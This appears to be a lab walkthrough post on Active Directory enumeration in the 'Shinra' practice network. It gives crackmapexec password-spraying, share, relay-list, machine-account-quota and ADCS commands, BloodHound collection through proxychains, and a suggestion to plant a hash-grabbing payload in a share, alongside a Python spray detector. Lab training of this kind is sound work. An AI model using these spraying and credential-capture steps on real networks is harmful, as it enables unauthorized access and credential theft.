VL Shinra Part 2 – Enumerate, Enumerate, Enumerate!

This is the second video of the Shinra series. Before setting foot onto any of the network’s internal machines, we are going to spend a bit of time enumerating various things from our machine.

Some ideas for further steps that are not shown in the video:

  • Spray “Shinra2022” or variations of it against all users in the domain.
  • Place a hash-grabbing payload (e.g. https://github.com/xct/hashgrab) inside the workspace share and see if you can find any hashes.




tcpdump -i ens37 -s 0 -w - -U | tee output.pcap | tcpdump -r -

Credential spraying

crackmapexec smb -u user.txt -p pass.txt --no-bruteforce --continue-on-success
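
Seen from the defender's side, a spray like the one above leaves a recognisable shape in the Windows Security log: one source failing against many accounts with only one or two attempts each. The detection logic below is an added example, not part of the original post; the tuple layout, the thresholds and the sample events are constructed assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample records: (timestamp, event ID, source IP, target account).
# 4625 = failed logon, 4624 = successful logon (Windows Security log).
SAMPLE_EVENTS = (
    # one source, six accounts, one attempt each, then a successful logon
    [(f"2022-03-01T09:00:{i:02d}", 4625, "10.0.0.66", f"user{i:02d}") for i in range(6)]
    + [("2022-03-01T09:00:07", 4624, "10.0.0.66", "user06")]
    # one user mistyping a password four times
    + [(f"2022-03-01T09:{m:02d}:00", 4625, "10.0.0.20", "user01") for m in range(4)]
    # unrelated failures an hour apart
    + [(f"2022-03-01T{h:02d}:00:00", 4625, "10.0.0.30", f"user{h:02d}") for h in range(10, 16)]
)


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5, max_per_account=2):
    """Flag sources that fail against many accounts, few tries each, in one window."""
    fails, wins = defaultdict(list), defaultdict(set)
    for ts, event_id, src, account in events:
        if event_id == 4625:
            fails[src].append((datetime.fromisoformat(ts), account.lower()))
        elif event_id == 4624:
            wins[src].add(account.lower())

    report = {}
    for src, rows in fails.items():
        rows.sort()
        sprayed, start = set(), 0
        for end, (ts, _) in enumerate(rows):
            while ts - rows[start][0] > window:  # slide the window forward
                start += 1
            per_account = Counter(acct for _, acct in rows[start:end + 1])
            if len(per_account) >= min_accounts and max(per_account.values()) <= max_per_account:
                sprayed.update(per_account)
        if sprayed:
            # Successful logons from a flagged source are the accounts to triage first.
            report[src] = {"sprayed": sorted(sprayed), "succeeded": sorted(wins[src])}
    return report


if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_EVENTS).items():
        print(src, info)
```
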


sudo sh -c 'proxychains python3 /home/xct/tools/dnschef/dnschef.py --fakeip --fakedomains shinra-dev.vl -q'

proxychains bloodhound-python -c all --disable-pooling -w 1 -u "william.davis" -p 'password' -d shinra-dev.vl -dc dc.shinra-dev.vl -ns


crackmapexec smb -u "william.davis" -p 'password' --shares

SMB Signing

crackmapexec smb --gen-relay-list relay.txt

Machine Account Quota

crackmapexec ldap -u "william.davis" -p 'password' -M maq


crackmapexec ldap -u "william.davis" -p 'password' -M adcs
crackmapexec ldap -u "william.davis" -p 'password' -M adcs -o SERVER=shinra-dev-CA
certipy find -u "william.davis" -p 'password' -dc-ip 
